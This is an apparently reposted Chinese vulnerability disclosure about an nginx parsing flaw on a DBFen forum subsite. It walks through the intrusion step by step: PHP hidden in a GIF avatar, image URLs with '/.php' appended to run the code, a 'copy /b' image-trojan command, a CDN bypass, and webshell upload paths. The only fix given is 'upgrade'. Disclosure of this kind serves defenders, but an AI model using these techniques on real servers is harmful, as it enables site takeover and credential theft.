因是 论坛 故存在上传.
通过头像上传处抓包二次渲染前的加入<php phpinfo();?>原图.
http://bbs.dbfen.com/data/attachment/forum/201401/20/124804tkv7xu06npxs839v.gif/.php
通过phpinfo获取服务器真实IP.
改host绕过加速乐可上传并使用一句话.
论坛沦陷.
图片木马合成
E:\>copy 1.gif /b+ qiangda.php /b c.gif 1.gif qiangda.php
已复制 1 个文件。
传小马
http://bbs.dbfen.com/data/attachment/forum/201401/20/142927ubc80udjqrjbuoqm.gif/.php?id=cshell
小马传大马
http://bbs.dbfen.com/data/attachment/forum/201401/20/zip.php
通过论坛可查管理员密码, 主站岌岌可危.
但我都只是说说, 什么都没做. 真的. ;)
希望做云端的厂商更是一定要提高安全意识.
修复方案:
升级
查看更多关于多备份(DBFen)某分站nginx解析漏洞(可getshell) - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15699